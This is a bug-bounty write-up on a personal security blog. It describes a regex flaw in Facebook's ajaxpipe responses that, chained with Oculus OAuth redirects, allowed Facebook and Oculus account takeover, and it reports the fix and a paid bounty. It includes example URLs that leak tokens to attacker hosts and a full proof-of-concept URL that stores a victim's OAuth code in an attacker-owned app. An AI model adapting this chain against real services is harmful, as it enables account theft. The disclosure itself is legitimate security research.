<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Facebook account takeover due to a wide platform bug in ajaxpipe responses | Youssef Sammouda (sam0) personal blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Facebook account takeover due to a wide platform bug in ajaxpipe responses" />
<meta name="author" content="qw" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="This bug could allow a malicious user to steal the access_token/code of a first party Facebook application and use it to takeover the Facebook account. This happens due to some preformatted scripts returned when the ajaxpipe or quickling parameters were added to any requested endpoint in any website built by Facebook." />
<meta property="og:description" content="This bug could allow a malicious user to steal the access_token/code of a first party Facebook application and use it to takeover the Facebook account. This happens due to some preformatted scripts returned when the ajaxpipe or quickling parameters were added to any requested endpoint in any website built by Facebook." />
<link rel="canonical" href="http://localhost:4000/2021/04/02/facebook-account-takeover-due-to-a-wide-platform-bug-in-ajaxpipe-responses.html" />
<meta property="og:url" content="http://localhost:4000/2021/04/02/facebook-account-takeover-due-to-a-wide-platform-bug-in-ajaxpipe-responses.html" />
<meta property="og:site_name" content="Youssef Sammouda (sam0) personal blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-04-02T00:27:18+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Facebook account takeover due to a wide platform bug in ajaxpipe responses" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"qw"},"dateModified":"2021-04-02T00:27:18+01:00","datePublished":"2021-04-02T00:27:18+01:00","description":"This bug could allow a malicious user to steal the access_token/code of a first party Facebook application and use it to takeover the Facebook account. This happens due to some preformatted scripts returned when the ajaxpipe or quickling parameters were added to any requested endpoint in any website built by Facebook.","headline":"Facebook account takeover due to a wide platform bug in ajaxpipe responses","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/04/02/facebook-account-takeover-due-to-a-wide-platform-bug-in-ajaxpipe-responses.html"},"url":"http://localhost:4000/2021/04/02/facebook-account-takeover-due-to-a-wide-platform-bug-in-ajaxpipe-responses.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Youssef Sammouda (sam0) personal blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Youssef Sammouda (sam0) personal blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Facebook account takeover due to a wide platform bug in ajaxpipe responses</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2021-04-02T00:27:18+01:00" itemprop="datePublished">Apr 2, 2021
      </time>• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">qw</span></span></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>This bug could allow a malicious user to steal the access_token/code of a first party Facebook application and use it to takeover the Facebook account. This happens due to some preformatted scripts returned when the ajaxpipe or quickling parameters were added to any requested endpoint in any website built by Facebook.</p>

<p><strong>Details</strong></p>

<p>A response to a request sent to any Facebook endpoint/page could be returned in a different way than the usual format: A normal response would be a HTML page containing the data or functionality an endpoint is serving. However, if the content of the requested endpoint/page doesn’t need to be displayed to the user but the data returned is needed by another page, parameters like <strong>ajaxpipe</strong> or <strong>quickling</strong> could be added to the request which would result in the content of the page to not be shown but transferred to the parent window by calling a function called <strong>require</strong> and a module called <strong>JSONPTransport</strong>. This is usually done as an alternative way of doing ajax requests. The response to a such request with previous parameters included would be something like this:</p>

<pre><code class="language-markup">&lt;html&gt;&lt;body&gt;&lt;script type="text/javascript"&gt;window._cstart = parent._q_cstart = (+new Date);&lt;/script&gt;
&lt;script&gt;
if (self != top) {
    parent.require("JSONPTransport").respond(0, {
        "__ar": 1,
        "payload": {
            "redirect": "https:\/\/www.facebook.com\/"
        }
    }, false);
} else {
    window.location.search = window.location.search.replace(/\b(quickling|ajaxpipe|ajaxpipe_token)\b[^&amp;]*&amp;?/g, "");
}
&lt;/script&gt;
&lt;/body&gt;&lt;/html&gt;
</code></pre>

<p>Here the script is used to transfer the content of the page to the parent window (if same origin) however if the current window is top then this would perform some regular expression matching to change the location of the page after removing any occurrences of the quickling/ajaxpipe/ajaxpipe_token parameters. Here of course the window.location.search is checked and modified since it would return the querystring part of the current URL. <br />
The bug here is that the regex is not doing it right and allows a sophisticated attacker to abuse this in his/her benefit to launch some attacks. Let’s first figure out what’s wrong here:</p>

<p>– If we analyse the code we’ll notice that the Javascript method <strong>replace</strong> was used to modify the <strong>location.search</strong> value using a regular expression matching. Anything matched using the regular expression would be removed since it’s replaced with nothing “”.<br />
– The regular expression has the parameters names <strong>(quickling|ajaxpipe|ajaxpipe_token)</strong> put between “<strong>\b</strong>” anchors which would allow a word only matching of them ( these string were found between non-word characters ). Then it would look for zero or multiple occurrences of the character <strong>&amp;</strong>. The <strong>g</strong> modifier was used which means it would perform a global match ( won’t return at first match ). As an example here, if we have the query string part as “?ajaxpipe=1&amp;test=value”, this regex would match <strong>ajaxpipe=1&amp;</strong> and remove it.</p>

<ul>
  <li>First problem is that the anchor “<strong>\b</strong>” was used at the beginning of the regex which would look for non-word characters before the appearance of the mentioned words ( no characters in this groupset should be found [A-Za-z0-9_] for a match to happen). However, this would allow other characters to be included before the words like ( ? , – , =). This would help a lot later in the attack.</li>
  <li>Second problem is that this regex would match appearances of these words anywhere in the querystring part of the url and not only when they were found as parameters names. This is also linked or due to the first problem. A way to make sure these words are actually parameters names is to check if before them there was a <strong>&amp;</strong> character or the word was found at the beginning of the string after a <strong>?</strong> character ( using ^\? ) . As an example here, if we take this querystring part of the url “?testing=ajaxpipe=random” then <strong>ajaxpipe=random</strong> would be matched even though it’s a value supplied to a parameter and not the parameter name.</li>
  <li>
    <p>Final problem is that the g modifier was used which would do multiples matches. The querystring part could contain the words ajaxpipe/quickling/ajaxpipe_token as parameters names and in the same time as values supplied to other parameters. When the matching is done, the parameters would be replaced and also the values inside other parameters. This would allow us to abuse the previous problems to fully construct a working exploit.</p>

    <p>PS: If you like to better understand how the regular expression works, try to use regex101 or regexr.</p>
  </li>
</ul>

<p>To summarize what i thought i can do with this:<br />
Let’s take for example this URL: <strong>https://www.facebook.com/endpoint?ajaxpipe=1&amp;redirect_uri=https://attacker.com/?code=ajaxpipe=2&amp;token=ACCESS_TOKEN</strong>.<br />
The parameter ajaxpipe=1 would result in the response described in the beginning to be returned. The regular expression would try to replace the ajaxpipe parameter since the window is top. It would first match <strong>ajaxpipe=1&amp;</strong> and then due to the problems 1 and 2, it would also match <strong>ajaxpipe=2&amp;</strong> ( they resulted to the character <strong>=</strong> to be allowed before ajaxpipe=random and also not being a parameter name but a parameter value). <br />
The two matches would be removed and the page would be redirected to : <strong>https://www.facebook.com/endpoint?redirect_uri=https://attacker.com/?code=token=ACCESS_TOKEN</strong>. <br />
What happened here is that the parameter <strong>token=ACCESS_TOKEN</strong> became apart of the value inside the <strong>redirect_uri</strong> parameter and was formatted in a way to be appended as value to the code parameter inside the URL inside redirect_uri. Also <strong>ajaxpipe=1</strong> parameter was removed which resulted in the page response returned being the normal one. <br />
Now if the endpoint was redirecting to the URL inside redirect_uri, it would result in a redirect to <strong>https://attacker.com/?code=token=ACCESS_TOKEN</strong> which would leak the ACCESS_TOKEN to the attacker. The expected safe behaviour here is to redirect to <strong>https://attacker.com/?code=ajaxpipe=2</strong>.</p>

<p><strong>Finally the attack</strong>!</p>

<p>I exploited this behaviour to achieve the possibility of takeover of Facebook/Oculus accounts. Since this existed in a big number of Facebook websites ( facebook.com , oculus.com , messenger.com …) i had a big scope to look for a way to abuse this:</p>

<p>– To login to your Oculus account, you should visit <strong>https://auth.oculus.com/login/</strong> . This page allows you to login to your account using Facebook. If you are already logged-in to Facebook and you already linked an Oculus account to your Facebook account, visiting this page would result to you being automatically logged-in to your Oculus account ( The Facebook Javascript SDK do a request to facebook.com and gets the access_token via /x/oauth/status endpoint ).</p>

<p>– You can also request a code from Facebook for Oculus login by using the OAuth flow (/dialog/oauth endpoint). An example URL is the following https://www.facebook.com/v3.1/dialog/oauth?app_id=1517832211847102&amp;redirect_uri=https://auth.oculus.com/login/&amp;response_type=code. This would redirect to https://auth.oculus.com/login/?code=FB_CODE.</p>

<p>– The redirect_uri of the Oculus application could have any string appended after https://auth.oculus.com/login . It means we can add additional parameters or change the callback endpoint.</p>

<p>– There’s the endpoint https://auth.oculus.com/login-without-facebook/ which accepts a parameter called redirect_uri. If the user is already logged-in to Oculus it would redirect to the URL inside redirect_uri. We can use this endpoint in the redirect_uri in the Facebook OAuth flow</p>

<p><strong>First try:</strong> <br />
We combine the previous facts to make this first attack try. The victim visits this URL:<br />
https://www.facebook.com/v3.1/dialog/oauth?app_id=1517832211847102&amp;redirect_uri=https://auth.oculus.com/login-without-facebook/?<strong>ajaxpipe=1%26</strong>redirect_uri=https://ysamm.com/?code=<strong>ajaxpipe</strong>&amp;response_type=code</p>

<p>This would redirect to https://auth.oculus.com/login-without-facebook/?<strong>ajaxpipe=1&amp;</strong>redirect_uri=https%3a//ysamm.com/%3fcode%3dajaxpipe&amp;code=FACEBOOK_CODE. Since we have an ajaxpipe parameter the second response format would be returned and the replacing using the regex would be done. The highlighted part would be removed. The second ajaxpipe&amp; won’t be removed here since browsers would URL encode parameters’ values which would result to the <strong>=</strong> character being replaced with <strong>%3d</strong>. Since <strong>d</strong> is before ajaxpipe and it’s a word character then the matching would fail and though the attack.</p>

<p><strong>Second try:</strong></p>

<p>I looked for characters which were not URL encoded by browsers if they were found inside a parameter’s value. I found that <strong>–</strong> is not URL encoded and i inserted it before the second ajaxpipe:<br />
https://www.facebook.com/v3.1/dialog/oauth?app_id=1517832211847102&amp;redirect_uri=https://auth.oculus.com/login-without-facebook/?<strong>ajaxpipe=1%26</strong>redirect_uri=https://ysamm.com/?code=<strong>-ajaxpipe</strong>&amp;response_type=code</p>

<p>This URL would result in a redirect to https://auth.oculus.com/login-without-facebook/?<strong>ajaxpipe=1&amp;</strong>redirect_uri=https%3a//ysamm.com/%3fcode%3d-<strong>ajaxpipe&amp;</strong>code=FACEBOOK_CODE</p>

<p>Since now both ajaxpipe are matched using the regex, it would result in another redirect ( because if you didn’t notice , the script mentioned above would assign window.location.search a new value after the removal ) to https://auth.oculus.com/login-without-facebook/?redirect_uri=<strong>https%3a//ysamm.com/%3fcode%3d-code=FACEBOOK_CODE</strong></p>

<p>If you notice here the code=FACEBOOK_CODE was appended to the value of the parameter redirect_uri instead of being a separate parameter. If the login-without-facebook endpoint would redirect to the URL inside redirect_uri parameter, we would end-up being redirected to <strong>https://ysamm.com/?code=-code=FACEBOOK_CODE</strong> and though stealing the Facebook OAuth code of the victim. Unfortunately, this endpoint had protection in place from open redirects so i had to find a way to leak the code by redirecting to a whitelisted domain.</p>

<p><strong>Third and final try</strong></p>

<p>The API endpoint <strong><em>https://graph.oculus.com/{OC_APP_ID}/achievement_definitions</em></strong>  could be used to create a new achievement definition for a certain owned oculus application. The endpoint accepts many parameters and some of them would be saved and could be fetched later by us. To make a request to this API endpoint, we could include our own application credentials in the final URL to be sent to the victim. We can use one of these parameter like the description field which should be filled with the victim code. The code can be retrieved later by first fetching <strong><em>https://graph.oculus.com/{OC_APP_ID}/achievement_definitions?method=get&amp;access_token=OC|ATTACKER_APP_ID|APP_SECRET</em></strong>. This would return the list of achievements ids. Each id would be referring to different stored code. To retrieve the code:<br />
<strong><em>https://graph.oculus.com/{ACHIEVEMENT_ID}?fields=description&amp;method=get&amp;access_token=OC|ATTACKER_APP_ID|APP_SECRET</em></strong>. We’ll find “-code=CODE_HERE” in the description field.</p>

<p><strong>Proof of concept</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://www.facebook.com/v3.1/dialog/oauth?app_id=1517832211847102&amp;redirect_uri=https%3A%2F%2Fauth.oculus.com%2Flogin-without-facebook%2F%3Fajaxpipe%3D1%26redirect_uri%3Dhttps%253a%2F%2Fgraph.oculus.com%2FATTACKER_APP_ID%2Fachievement_definitions%253fmethod%253dpost%2526access_token%253dOC|ATTACKER_APP_ID|ATTACKER_APP_SECRET&lt;/strong&gt;%2526api_name%253dVISIT_3_CONTINENTS%2526achievement_type%253dBITFIELD%2526achievement_write_policy%253dCLIENT_AUTHORITATIVE%2526target%253d3%2526bitfield_length%253d7%2526is_archived%253dfalse%2526title%253dAchievement%2526unlocked_description_override%253dYou%252bdid%252bit%2526is_secret%253dfalse%2526description%253d-ajaxpipe&amp;response_type=code
</code></pre></div></div>

<p>Where <strong>OC|ATTACKER_APP_ID|ATTACKER_APP_SECRET</strong> is the attacker owned Oculus application credentials<br />
This URL would redirect to:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://auth.oculus.com/login-without-facebook/?ajaxpipe=1&amp;&lt;/strong&gt;redirect_uri=https%3A%2F%2Fgraph.oculus.com%2FATTACKER_APP_ID%2Fachievement_definitions%3Fmethod%3Dpost%26access_token%3DOC%7CATTACKER_APP_ID%7CATTACKER_APP_SECRET%26api_name%3DVISIT_3_CONTINENTS%26achievement_type%3DBITFIELD%26achievement_write_policy%3DCLIENT_AUTHORITATIVE%26target%3D3%26bitfield_length%3D7%26is_archived%3Dfalse%26title%3DAchievement%26unlocked_description_override%3DYou%2Bdid%2Bit%26is_secret%3Dfalse%26description%3D-ajaxpipe&amp;&lt;/strong&gt;code=VICTIM_CODE
</code></pre></div></div>

<p>This would result to the second format response being returned and the regex trying to remove ajaxpipe words appearances. It should redirect to this URL:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://auth.oculus.com/login-without-facebook/?redirect_uri=https%3A%2F%2Fgraph.oculus.com%2FATTACKER_APP_ID%2Fachievement_definitions%3Fmethod%3Dpost%26access_token%3DOC%7CATTACKER_APP_ID%7CATTACKER_APP_SECRET%26api_name%3DVISIT_3_CONTINENTS%26achievement_type%3DBITFIELD%26achievement_write_policy%3DCLIENT_AUTHORITATIVE%26target%3D3%26bitfield_length%3D7%26is_archived%3Dfalse%26title%3DAchievement%26unlocked_description_override%3DYou%2Bdid%2Bit%26is_secret%3Dfalse%26description%3D-code=VICTIM_CODE&lt;/strong&gt;
</code></pre></div></div>

<p>The code parameter was appended to the redirect_uri. Since graph.oculus.com is a whitelisted domain, the endpoint /login-without-facebook/ would redirect to the URL inside redirect_uri:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://graph.oculus.com/ATTACKER_APP_ID/achievement_definitions?method=post&amp;access_token=OC|ATTACKER_APP_ID|ATTACKER_APP_SECRET&lt;/strong&gt;&amp;api_name=VISIT_3_CONTINENTS&amp;achievement_type=BITFIELD&amp;achievement_write_policy=CLIENT_AUTHORITATIVE&amp;target=3&amp;bitfield_length=7&amp;is_archived=false&amp;title=Achievement&amp;unlocked_description_override=You+did+it&amp;is_secret=false&amp;description=-code=VICTIM_CODE&lt;/strong&gt;
</code></pre></div></div>

<p>Since the access_token is valid, a new achievement definition should be created with the field description having the value <strong>-code=VICTIM_CODE</strong>.</p>

<p>We can get the victim code by querying the created achievement definition data. Getting the code would allow us to access the Oculus account. After accessing the Oculus account we can get the Facebook access_token and use it to also takeover the Facebook account ( see https://ysamm.com/?p=525 for more details)</p>

<p><strong>Fix</strong></p>

<p>Facebook fixed this by using a stricter regular expression to remove the ajaxpipe words:<br />
window.location.search.replace(<strong>/(^\?|&amp;)(quickling|ajaxpipe|ajaxpipe_token)\b[^&amp;]*&amp;?/g, “$1”</strong>)<br />
Notice that now all previously mentioned problems were eliminated. Now it ensures these words are matched only if there is the character <strong>&amp;</strong> or a beginning <strong>?</strong> before them ( ^ is important here and not just checking for a <strong>?</strong> because in a case where a browser didn’t URL encode parameters values, this could resulted in a bypass since we can then use <strong>description=?ajaxpipe&amp;</strong> instead of <strong>description=-ajaxpipe&amp;</strong> in the poc)</p>

<p><strong>Timeline</strong></p>

<p>Feb 13, 2021— Report Sent <br />
Feb 23, 2021— Acknowledged by Facebook<br />
Mar 2, 2021— Fixed by Facebook<br />
Mar 30, 2021 — $30K (including bonus) bounty awarded by Facebook.</p>


  </div><a class="u-url" href="/2021/04/02/facebook-account-takeover-due-to-a-wide-platform-bug-in-ajaxpipe-responses.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Youssef Sammouda (sam0) personal blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Youssef Sammouda (sam0) personal blog</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">samm0uda</span></a></li><li><a href="https://www.twitter.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">samm0uda</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>The goal of this blog is to share write-ups about bugs i have found in Facebook and reported to them under the Facebook bug bounty program.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
